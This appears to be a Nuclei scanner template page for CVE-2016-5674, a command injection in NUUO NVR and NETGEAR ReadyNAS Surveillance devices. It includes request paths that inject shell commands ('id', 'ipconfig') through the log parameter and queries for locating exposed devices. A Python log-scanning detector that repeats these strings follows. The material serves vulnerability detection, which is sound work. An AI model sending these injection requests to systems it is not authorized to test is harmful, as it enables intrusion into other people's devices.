NUUO NVR camera `debugging_center_utils_.php` - Command Execution
ID: CVE-2016-5674
Severity: critical
Author: DhiyaneshDK
Tags: cve,cve2016,nuuo,rce,netgear
Description
__debugging_center_utils___.php in NUUO NVRmini 2 1.7.5 through 3.0.0, NUUO NVRsolo 1.7.5 through 3.0.0, and NETGEAR ReadyNAS Surveillance 1.1.1 through 1.4.1 allows remote attackers to execute arbitrary PHP code via the log parameter.
YAML Source
```yaml
id: CVE-2016-5674

info:
  name: NUUO NVR camera `debugging_center_utils_.php` - Command Execution
  author: DhiyaneshDK
  severity: critical
  description: |
    __debugging_center_utils___.php in NUUO NVRmini 2 1.7.5 through 3.0.0, NUUO NVRsolo 1.7.5 through 3.0.0, and NETGEAR ReadyNAS Surveillance 1.1.1 through 1.4.1 allows remote attackers to execute arbitrary PHP code via the log parameter.
  reference:
    - http://www.kb.cert.org/vuls/id/856152
    - https://www.exploit-db.com/exploits/40200/
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2016-5674
    cwe-id: CWE-20
    epss-score: 0.95793
    epss-percentile: 0.99431
    cpe: cpe:2.3:a:netgear:readynas_surveillance:1.1.1:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: netgear
    product: "readynas_surveillance"
    fofa-query:
      - "app=\"NUUO-NVRmini\" || app=\"NUUO-NVR\" || title=\"Network Video Recorder Login\""
      - app="nuuo-nvrmini" || app="nuuo-nvr" || title="network video recorder login"
  tags: cve,cve2016,nuuo,rce,netgear

variables:
  rand: "{{to_lower(rand_text_alpha(32))}}"

http:
  - method: GET
    path:
      - "{{BaseURL}}/__debugging_center_utils___.php?log=;echo%20{{rand}}%20|%20id"
      - "{{BaseURL}}/__debugging_center_utils___.php?log=;echo%20{{rand}}%20|%20ipconfig"

    stop-at-first-match: true
    matchers-condition: or
    matchers:
      - type: dsl
        dsl:
          - "status_code_1 == 200"
          - "contains(body_1, 'Debugging Center')"
          - "regex('uid=([0-9(a-z)]+) gid=([0-9(a-z)]+)', body_1)"
        condition: and

      - type: dsl
        dsl:
          - "status_code_2 == 200"
          - "contains(body_2, 'Debugging Center')"
          - "contains(body_2, 'Windows IP')"
        condition: and
# digest: 490a004630440220763c856465f94c7b489687a0ed970a104c8507cbc9d51993a69f32744411bd7a02203852e6a2018f5178177de2200f60bda6e0c1de7a185b4b7b7fe75b1bd45c868d:922c64590222798bb761d5b6d8e72950
```
Guide to check the vulnerabilities
This template detects CVE-2016-5674 by sending up to two requests and matching on the responses. Run it with the Nuclei tool against a target URL:
$ nuclei -u "URL" -t "http/cves/2016/CVE-2016-5674.yaml"
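To complement the scan, the following added example (not part of the template or the Nuclei project) flags requests to the same script in web access logs and separates plain access from `log` values carrying shell metacharacters. The combined log format, the sample lines and all function names are assumptions made for illustration.

```python
import re
from urllib.parse import urlsplit, unquote, unquote_plus

ENDPOINT = "__debugging_center_utils___.php"   # script named in the template above
SHELL_META = re.compile(r"[;|&`$<>\r\n]")      # characters a log selector never needs
# Request part of an Apache/nginx "combined" access-log line (assumed log format).
LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)[^"]*" (?P<status>\d{3})')

def log_values(query):
    """Decoded values of every `log` parameter; split on '&' only so ';' stays in the value."""
    out = []
    for pair in query.split("&"):
        key, _, val = pair.partition("=")
        if unquote_plus(key) == "log":
            out.append(unquote_plus(val))
    return out

def classify(line):
    """None for unrelated lines, otherwise a finding for a request to the debug script."""
    m = LINE.match(line)
    if not m:
        return None
    parts = urlsplit(m["target"])
    if unquote(parts.path).rsplit("/", 1)[-1].lower() != ENDPOINT:
        return None
    injected = any(SHELL_META.search(v) for v in log_values(parts.query))
    return {
        "ip": m["ip"],
        "verdict": "injection-attempt" if injected else "endpoint-access",
        "served": m["status"] == "200",   # the template's matchers also require HTTP 200
    }

# Constructed sample lines (documentation IP ranges), not taken from a real device.
SAMPLE = [
    '203.0.113.7 - - [12/Mar/2024:10:01:22 +0000] "GET /__debugging_center_utils___.php?log=;echo%20abcdefgh%20|%20id HTTP/1.1" 200 812',
    '198.51.100.4 - - [12/Mar/2024:10:01:25 +0000] "GET /login.php HTTP/1.1" 200 1024',
    '192.0.2.15 - - [12/Mar/2024:10:02:03 +0000] "GET /__debugging_center_utils___.php?log=system.log HTTP/1.1" 404 0',
    '198.51.100.9 - - [12/Mar/2024:10:05:41 +0000] "GET /__debugging_center_utils___.php?log=%3Becho%20x%20%7C%20ipconfig HTTP/1.1" 200 930',
]

def scan(lines):
    """Findings for every line that touches the debug script, in input order."""
    return [f for f in map(classify, lines) if f]

if __name__ == "__main__":
    for finding in scan(SAMPLE):
        print(finding)
```

An access log cannot show the response body, so a `served` hit is a lead to investigate, not proof that the command ran.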